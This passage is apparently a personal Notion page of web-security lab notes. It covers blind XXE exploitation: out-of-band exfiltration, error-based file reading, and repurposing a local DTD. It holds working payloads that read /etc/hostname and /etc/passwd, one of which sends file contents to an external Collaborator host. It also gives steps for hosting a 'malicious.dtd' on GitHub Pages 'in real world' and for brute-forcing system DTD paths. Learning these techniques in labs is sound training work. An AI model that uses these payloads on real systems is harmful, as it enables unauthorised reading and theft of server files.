integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="d14faf18-a5e5-4536-aa73-6c3730d34c40" class="code"><code class="language-Bash">&lt;!ENTITY % file SYSTEM &quot;file:///etc/hostname&quot;&gt;
&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; exfil SYSTEM &#x27;http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;&#x27;&gt;&quot;&gt;
%eval;
%exfil;</code></pre><h3 id="6351a904-ac19-4101-ba76-0492fc3b17c1" class=""><code>Hosting the DTD File</code></h3><h3 id="a84d9042-9fc5-472f-90cd-a93866f8bc54" class="">1. Using a Free Web Hosting Service</h3><p id="fc422d51-38a4-410f-9460-6280a9c5aa1f" class=""><strong>Step-by-Step Instructions</strong>:</p><ol type="1" id="73323aee-fa9d-4948-b1ab-17e75e1e861f" class="numbered-list" start="1"><li><mark class="highlight-yellow"><strong>Sign Up for a Free Web Hosting Service</strong></mark><mark class="highlight-yellow">:</mark><ul id="20019534-3bfb-455b-a957-fe4d4572409e" class="bulleted-list"><li style="list-style-type:disc">Services like GitHub Pages, Netlify, or any other free web hosting platform can be used.</li></ul><ul id="652a9d59-18a7-40fe-b1dc-511b2d71b57b" class="bulleted-list"><li style="list-style-type:disc">For example, you can use GitHub Pages.</li></ul></li></ol><ol type="1" id="7bc1ab3a-3e17-4325-b181-3bb2ec52ce03" class="numbered-list" start="2"><li><mark class="highlight-yellow"><strong>Create a Repository</strong></mark><mark class="highlight-yellow">:</mark><ul id="c1e47efb-51ad-4d65-bbb9-a30d7516630c" class="bulleted-list"><li style="list-style-type:disc">Go to GitHub and create a new repository.</li></ul><ul id="3158313a-0b72-4fb2-9e8b-050253bbfd53" class="bulleted-list"><li style="list-style-type:disc">Name it something like <code>malicious-dtd</code>.</li></ul></li></ol><ol type="1" id="1e600fcf-4656-4c54-880a-14881dafe0fd" class="numbered-list" start="3"><li><mark class="highlight-yellow"><strong>Upload the DTD File</strong></mark><mark class="highlight-yellow">:</mark><ul id="d5e2c3a2-4a02-4e09-bb01-f797f98f818c" class="bulleted-list"><li style="list-style-type:disc">Create your malicious DTD file on your local machine: Open a text editor and create the  DTD content which is mentioned in code up<br/>Save the file as <br/><code>malicious.dtd</code>.</li></ul></li></ol><ol type="1" id="ef2045a6-a4f0-4137-a2e3-49f041a425e2" class="numbered-list" start="4"><li><mark class="highlight-yellow"><strong>Host the File on GitHub Pages</strong></mark><mark class="highlight-yellow">:</mark></li></ol><ul id="866e185c-322b-4f0d-aa45-db573fc5b434" class="bulleted-list"><li style="list-style-type:disc">Upload the DTD file to your GitHub repository.</li></ul><ul id="265e797c-0561-47e2-885f-333d0f8d1c21" class="bulleted-list"><li style="list-style-type:disc">Enable GitHub Pages for the repository (usually found in the repository settings under the &quot;Pages&quot; section).</li></ul><ul id="5ab4515a-48c3-4fd5-b856-64c96f96394f" class="bulleted-list"><li style="list-style-type:disc">Get the URL where your DTD file is hosted, which would be something like <code>https://yourusername.github.io/malicious-dtd/yourfile.dtd</code>.</li></ul><ul id="ec4c61a4-d831-4f06-a32a-a03cf3c20072" class="bulleted-list"><li style="list-style-type:disc">Insert the following external entity definition in between the XML declaration and the <code>stockCheck</code> element: for the web am testing and i send the request </li></ul><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="b3fe4829-4900-4169-bebb-764603349622" class="code"><code class="language-Bash">&lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM &quot;YOUR-DTD-URL&quot;&gt; %xxe;]&gt;</code></pre><ul id="b5a50403-733c-4ac6-835d-39ea50b629ce" class="bulleted-list"><li style="list-style-type:disc">Go back to the Collaborator tab, and click &quot;Poll now&quot;. The HTTP interaction could contain the contents of the <code>/etc/hostname</code> file.</li></ul><p id="3c59004b-47b4-4cd0-a1a3-e67332d375b9" class="">
</p><h1 id="b7c0bc1f-c8a9-411c-a11e-a49d24e93e98" class=""><mark class="highlight-brown_background"><strong>9- Exploiting blind XXE to retrieve data via error messages</strong></mark></h1><p id="942731e5-f2b8-45a8-928f-7e8c53443e6b" class="">&quot;Check stock&quot; feature that parses XML input but does not display the result.</p><p id="aeef1e65-4c24-4447-b020-b8f3675893ef" class="">we can, use an external DTD to trigger an error message that displays the contents of the <code>/etc/passwd</code> file.</p><p id="7998ce53-7aad-41ef-b7be-404f924aa6ad" class="">
</p><p id="987e5af0-1106-47af-8b17-96857411a711" class="">Click &quot;Go to exploit server&quot; and save the following malicious DTD file on your server: but in real world i need to HOST this on host provider i can host in in GITHUB from previous explanation i made</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="c66de913-4b2e-45b6-b6c3-0df95140b1f1" class="code"><code class="language-HTML" style="white-space:pre-wrap;word-break:break-all">&lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;
&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; exfil SYSTEM &#x27;file:///invalid/%file;&#x27;&gt;&quot;&gt;
%eval;
%exfil;</code></pre><p id="0ed87803-2724-429d-bb01-3e7b234d3048" class="">I should take a note of the URL for my malicious DTD. </p><ul id="f3cf35ae-b661-491e-9a44-e4fc46079e56" class="bulleted-list"><li style="list-style-type:disc">Insert the following external entity definition in between the XML declaration and the <code>stockCheck</code> element:</li></ul><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="b01451b5-5d7b-4b95-a62c-245cfbbb8ca8" class="code"><code class="language-HTML"> &lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM &quot;YOUR-DTD-URL&quot;&gt; %xxe;]&gt;</code></pre><p id="dea4794b-5ef4-4640-b64d-39812d85313f" class="">You should see an error message containing the contents of the <code>/etc/passwd</code> file.</p><figure id="d48a00b6-9205-412d-b2c8-2f7431ed89e2" class="image" style="text-align:left"><a href="Untitled%203.png"><img style="width:816px" src="Untitled%203.png"/></a></figure><figure id="68a4e072-ae65-43c7-abb9-cbc7f28aedde" class="image"><a href="Untitled%204.png"><img style="width:708px" src="Untitled%204.png"/></a></figure><p id="db8561c7-9441-4e16-8765-e342734083f3" class="">
</p><h1 id="62e30dbf-c758-4eaf-9db0-f5554be152bf" class=""><mark class="highlight-brown_background"><strong>10- Exploiting XXE to retrieve data by repurposing a local DTD</strong></mark></h1><p id="9530f533-1d63-4713-a117-670d87cf8600" class="">
</p><figure id="e5646f15-1660-462f-854d-c1d896a143ba" class="image"><a href="Untitled%205.png"><img style="width:708.0166625976562px" src="Untitled%205.png"/></a></figure><p id="cdcf131a-d604-4c56-bcc9-ff6adf868d35" class="">This payload through me an error as shown in screen above. </p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="4b24c8b7-b10a-460e-bcda-55a317dd2cb0" class="code"><code class="language-HTML">&lt;!DOCTYPE mustafa [&lt;!ENTITY % hajus SYSTEM &quot;file:///etc/passwd&quot;&gt; %hajus;]&gt;</code></pre><p id="e5fb5a31-9ee4-4d04-9282-e29f81fe8a4c" class="">Ok now what if i add random directory after <code>/etc</code> , Lets see what an error am gonna get this time.</p><figure id="55105ffe-2f9f-4ccc-bd3f-06fcffa990f7" class="image"><a href="Untitled%206.png"><img style="width:708.0166625976562px" src="Untitled%206.png"/></a></figure><p id="6763038b-8d9b-420b-9e59-bc9a1c6b150c" class="">This time said <code>/etc/Mustafa</code> (Not a directory). So now i need to references <code>TDT file</code> that we now its exist , So how we can do that?</p><p id="07a777a8-716f-4360-bb74-a16f744a5de0" class="">this github owner has awesome TDT list so i copied it and send my request to intruder to brute force<code> exsist TDT</code> make sure to uncheck the <code>urlencode </code>mark.</p><figure id="33414e9c-800c-4c8e-850c-352e585acf16"><div class="source">https://github.com/GoSecure/dtd-finder/blob/master/list/dtd_files.txt</div></figure><p id="a6f581e3-8c9d-4900-8429-b48ea0071e06" class="">
</p><figure id="fc35d59d-e73f-4701-85d5-4fb8d2c6b5e6" class="image" style="text-align:left"><a href="Untitled%207.png"><img style="width:576px" src="Untitled%207.png"/></a></figure><p id="fea3cc13-963c-4de9-871b-eef9507ebb92" class="">
</p><figure id="7d14af7c-afb9-4e0c-a93d-0d13a2f07441" class="image" style="text-align:left"><a href="Untitled%208.png"><img style="width:480px" src="Untitled%208.png"/></a></figure><p id="4dd4be31-13a9-4bae-b562-015e942a348c" class="">And it work there is 2 DTD EXIST .</p><figure id="8b4b4590-8d37-45b7-b612-ae810178b369" class="image" style="text-align:left"><a href="Untitled%209.png"><img style="width:576px" src="Untitled%209.png"/></a></figure><p id="a9babd0c-f3cc-4e1d-9b57-59f1331a68df" class="">
</p><figure id="296944bf-9424-456e-9044-458149fda860" class="image"><a href="Untitled%2010.png"><img style="width:708.0166625976562px" src="Untitled%2010.png"/></a></figure><p id="1775d127-404c-40e0-93bf-4f76616e434c" class=""><br/>This will import the Yelp DTD, then redefine the <br/><code>ISOamso</code> entity, triggering an error message containing the contents of the <code>/etc/passwd</code> file.<br/><br/>Systems using the GNOME desktop environment often have a DTD at <br/><code>/usr/share/yelp/dtd/docbookx.dtd</code> containing an entity called <code>ISOamso.</code></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="97de4d90-a009-4e83-915b-fcc729a5440a" class="code"><code class="language-HTML">&lt;!DOCTYPE mustafa [&lt;!ENTITY % hajus SYSTEM &quot;file:///usr/share/yelp/dtd/docbookx.dtd&quot;&gt;
&lt;!ENTITY % ISOamso &#x27;
&lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;
&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; error SYSTEM &#x27;file:///nonexistent/%file;&#x27;&gt;&quot;&gt;
%eval;
%error;
&#x27;&gt;
%hajus;
]&gt;</code></pre><p id="3e6a81ce-639f-4af5-9616-55fb2e3be0b3" class="">
</p><p id="cb59d068-2e85-456b-9ef6-74005d78fe18" class="">
</p><p id="edf628e3-7f10-44da-bb57-cc958f1c3ee1" class="">
</p><p id="0eb7797a-8e79-464d-883f-5d37a128d3d7" class="">
</p><p id="19f664a8-4388-47a3-8b74-292d924808c2" class="">
</p><p id="daea2f92-ef89-4667-ab35-b334b4ed13f5" class="">
</p><p id="0ce43e21-68d4-43a7-880f-fd8c13205037" class="">
</p><p id="6ff6d5bf-1b7e-418f-a65c-ffc91b36531d" class="">
</p><p id="ab166223-95dc-4496-be15-41dd2c8c5cb2" class="">
</p><p id="ba183a22-76d8-48c3-b717-58cb25f030ed" class="">
</p><p id="78f40c76-5df4-4dc8-967d-71a327801f9a" class="">
</p><p id="7642a51f-cf97-4e71-9f33-e6a1075ee093" class="">
</p><p id="d4d9a8f4-a296-46a4-ab13-5f72e826d0b6" class="">
</p><p id="882aacf0-16ab-4695-ae3a-bd4746fe50b6" class="">
</p><p id="a50c0170-f443-4423-a3bc-f58d9aee29e6" class="">
</p><p id="5015244e-6226-4d6e-bd1a-54e6875cd6f4" class="">
</p><p id="ad6c1a7b-608a-4e26-85d8-79a8909b38c8" class="">
</p><p id="61f31e46-8cb7-404e-97a8-41302a468940" class="">
</p><p id="684905a3-5a9d-4ebe-89a2-45f20e34724a" class="">
</p><p id="328e4057-bfbf-4dc7-853e-8a0b41a0a90d" class="">
</p><p id="b8544748-ebbe-4a1a-b56c-48b1858698be" class="">
</p><p id="77168c8a-b991-4492-bcca-d853f01bc4cf" class="">
</p><p id="b0a02828-c7fe-4b1b-a62f-cd5f6a9c8b11" class="">
</p><p id="3cc78cf2-5baf-44b6-ab85-6058eec92893" class="">
</p><p id="9f3163cf-094a-47d5-b3f0-50b385e7db88" class="">
</p><p id="85735137-4cc5-423b-914e-d6b151fc7dbf" class="">
</p><p id="b2dae755-7c67-4b05-8955-ef401d6f2a2c" class="">
</p><p id="1bba841e-cec4-45a6-9ebb-b7e2f5accbb2" class="">
</p><p id="548f1d51-8aed-4bac-ba70-70b2f6bf23fb" class="">
</p><p id="84b1079f-a4a7-4bc5-8876-1e06448757b3" class="">
</p><p id="c6d01646-e0d3-4a41-b495-6bc34908aed8" class="">
</p><p id="a6e95f33-3b4e-4394-8862-19b37280a1c5" class="">
</p><p id="243aa470-3c12-418e-8626-6972c7125231" class="">
</p><p id="4927c4bf-8aed-40a6-8ba4-b4f7de907606" class="">
</p><p id="2303be75-e696-4b45-ac67-aba5eaaeaccf" class="">
</p><p id="c1e94e05-0e04-4935-bd15-82debb95e97a" class="">
</p><p id="dd937977-c524-4e0a-b826-05287954b73d" class="">
</p><p id="568651da-636e-4aef-bbf0-71d165c26ff2" class="">
</p><p id="f35febba-5e18-4628-966f-4eb74de68592" class="">
</p><p id="807d6afd-7cc8-4fe4-82f1-5876387a8b0b" class="">
</p><p id="390b2fbf-82e3-4bfa-8dc8-98030be0f4ba" class="">
</p><p id="976a8dab-e029-46a9-80ec-d1bea0c71756" class="">
</p><p id="e81788c8-1879-4ecc-8e9b-dc2f25349d22" class="">
</p><p id="0f433a53-7723-4033-b160-4ff6cbe7d6de" class="">
</p><p id="bf669977-1fa0-40b3-b8b4-b40c5fe714c8" class="">
</p><p id="d394645a-d399-442a-835f-08e168a81d9b" class="">
</p><p id="b1ea4dcc-8106-4c12-8051-43c4a8c685ca" class="">
</p><p id="39bc6725-12b6-4ba9-bf1c-6e07b29611ce" class="">
</p><p id="e545afd3-862f-47c2-b683-c9932319d57a" class="">
</p><p id="a1a1deab-c053-4db0-93fe-8d91cecad8d1" class="">
</p><p id="71a6193e-090a-45ba-9e77-34c467aca7ab" class="">
</p><p id="5401c771-2839-475f-8026-259f3b5c342c" class="">
</p><p id="0e361696-c80a-4f13-b280-be1363994725" class="">
</p><p id="9e9c37e3-635b-4ce0-a0f1-e52d02aad998" class="">
</p><p id="4fa529a3-966f-4868-a76c-87552898adef" class="">
</p><p id="4d15aa86-0f13-438a-b9a4-84549df2033f" class="">
</p><p id="f3e4fc45-c035-4ed4-bd84-1e53ef1b44a6" class="">
</p><p id="c9f9cbbb-334f-4887-b8d0-8ffc7ff4c88f" class="">
</p><p id="9c2124f4-4739-450e-ad55-10dc5c585ac4" class="">
</p><p id="baa9cf75-8009-4a71-a3ac-99732a24a72b" class="">
</p><p id="257ee1db-42a2-4424-8da3-1c602fc40440" class="">
</p><p id="a4f17662-ee59-48ad-ba3c-01c488575b89" class="">
</p><p id="b93f4da7-1713-4eaa-949b-bf66b9a8b6cb" class="">
</p><p id="73a7afba-2011-470b-b80c-8e7b7f98abe1" class="">
</p><p id="0e7c33ab-0dd7-4c6f-80b2-9bf657b5ba4f" class="">
</p><p id="7dcd783a-b161-454f-834d-671d39f0ccb8" class="">
</p><p id="15af0777-4567-412b-9133-1eae9dcb1559" class="">
</p><p id="9a698f6d-2ca7-498d-a767-41fda64a5d46" class="">
</p><p id="637a6576-bcf5-4542-92e5-641bcf89007a" class="">
</p><figure id="38ae6428-1399-4fb7-889d-a36703d02e5c" class="link-to-page"><a href="https://www.notion.so/File-upload-vulnerabilities-38ae642813994fb7889da36703d02e5c?pvs=21"><span class="icon">☠️</span>File upload vulnerabilities</a></figure><figure id="4fecb2db-f6ca-43c4-80fa-1176c8f64a65" class="link-to-page"><a href="https://www.notion.so/GraphQL-API-Vulns-4fecb2dbf6ca43c480fa1176c8f64a65?pvs=21"><span class="icon">😒</span> GraphQL API Vulns</a></figure><figure id="839502ef-5f2f-4995-b515-ab1f9d9d1467" class="link-to-page"><a href="https://www.notion.so/CSRF-839502ef5f2f4995b515ab1f9d9d1467?pvs=21"><span class="icon">🤑</span>(CSRF)</a></figure><figure id="9eaf80a8-2da2-44f6-8721-0ac7a3930d9a" class="link-to-page"><a href="https://www.notion.so/SSRF-9eaf80a82da244f687210ac7a3930d9a?pvs=21"><span class="icon">🤩</span>SSRF</a></figure><figure id="72b6f076-7637-46d5-a7db-42fde95a1f5c" class="link-to-page"><a href="https://www.notion.so/Server-side-template-injection-72b6f076763746d5a7db42fde95a1f5c?pvs=21"><span class="icon">❤️‍🔥</span>Server-side template injection</a></figure><figure id="018c4df2-6113-419f-b2b1-88f572e076a9" class="link-to-page"><a href="https://www.notion.so/Web-cache-poisoning-018c4df26113419fb2b188f572e076a9?pvs=21"><span class="icon">🪢</span>Web cache poisoning</a></figure><figure id="412ad974-f5f4-4f93-b350-61b93c1c9ac4" class="link-to-page"><a href="https://www.notion.so/Information-disclosure-412ad974f5f44f93b35061b93c1c9ac4?pvs=21"><span class="icon">🙈</span>Information disclosure</a></figure><figure id="60fd4678-b9ec-46e2-8f7d-a9487b945edb" class="link-to-page"><a href="https://www.notion.so/Business-logic-vulnerabilities-60fd4678b9ec46e28f7da9487b945edb?pvs=21"><span class="icon">🎇</span>Business logic vulnerabilities</a></figure></div></article><span class="sans" style="font-size:14px;padding-top:2em"></span></body></html>